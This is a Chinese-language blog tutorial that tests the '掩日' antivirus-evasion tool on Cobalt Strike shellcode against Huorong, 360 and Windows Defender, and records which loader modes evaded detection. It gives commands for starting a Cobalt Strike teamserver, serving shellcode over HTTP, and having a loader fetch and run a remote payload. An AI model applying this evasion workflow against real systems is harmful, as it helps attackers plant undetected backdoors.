更新時間：2022.05.16

本文首發烏鴉安全知識星球

1. 介紹

掩日免殺是一個非常優秀的項目，目前在4月19號已經更新，更新的變動較大，支持的種類更多，在這里再試試現在的效果如何：
https://github.com/1y0n/av_evasion_tool/

下載之后本地打開：（記得關閉殺軟）

2. 環境配置

安裝環境：Windows10虛擬機
在這里新版本掩日采用了gcc環境和go環境，在作者的項目介紹中，對其都有要求，我們按照要求分別安裝gcc和go的環境：

gcc安裝

gcc --version

go安裝

go version

3. 環境

在作者的介紹中，針對Cobalt Strike生成的木馬要求：
針對Cobalt Strike，不要選擇生成Windows分階段木馬、Windows無階段木馬，而是生成payload，最終是一個payload.c文件。
因此在這里我們使用最常用的CS的木馬來進行操作。

3.1 環境準備

在本地啟動一個CS，服務端：
sudo ./teamserver 10.30.1.147 123

啟用客戶端，并新增監聽，在這里使用作者建議的HTTPS方式：

然后生成一個payload.c文件：

3.2 測試環境

測試機：

• Windows10 360主動防御
• Windows7 火絨主動防御
• Windows10 開啟windows Defender

其中測試的殺軟均升級到最新，并且關閉了自動上傳樣本的功能。

4. 免殺測試

4.1 通用免殺

在這里選擇直接執行的方式，并且使用隱藏窗口的模式：

此時生成成功：

4.1.1 火絨（成功）

此時沒有發現問題，上線測試：

4.1.2 360（成功）

關閉360的自動上傳樣本功能：

然后按位置掃描，沒有發現問題：

上線測試下，此時上線正常：

4.1.3 Windows Defender（失敗）

此時的 Windows Defender病毒庫為最新版本：

靜態測試

動態上線（被殺）

在上線之后，立刻被攔截查殺：

在這里可以發現，三個殺軟中只有Windows Defender難過，因此針對它進一步進行測試：
在這里選擇了加密方法，然后再去生成木馬，但是發現過Windows Defender的時候，依舊被殺。

4.1.4 強力模式（成功）

在這里選擇強力模式，作者對于強力模式的解釋是擁有很好的免殺和反沙盒效果，但是耗時比較長，而且會消耗大量的CPU

此時靜態查殺，依舊正常

動態上線正常：

4.2 分離免殺

在這里執行的時候，會生成兩個文件，一個是不含shellcode的shellcode加載器，另外就是一個shellcode文件（可能經過了各種加密變形）。

此時生成了兩個文件：

靜態查殺正常：

動態加載：
動態加載的話，不是直接雙擊上線的，而是在命令行中，將exe加載，并且跟上分離文件的名稱才可以：(此時沒有殺軟)

當有Windows Defender的時候：

直接被動態查殺，再試試其他的方式，發現全部被殺

4.3 網絡分離

將生成的shellcode加載器放到目標機器上，并在目標機能訪問到的機器上開啟一個http服務：
python3 -m http.server 802

然后在遠程進行加載：
dUu.exe http://10.30.1.147:802/dUu.txt

還是被Windows Defender殺了：

5. 總結

在整個掩日免殺項目中，可以看到功能比以前增加了很多，而且體驗感變好，免殺能力也很強。
當然Windows Defender依舊是很難對抗的，很多情況下還是要看對方的環境是啥，不要一味地追求Bypass everyone！

總結

以上是生活随笔為你收集整理的【新版】掩日免杀windows Defender「建议收藏」的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。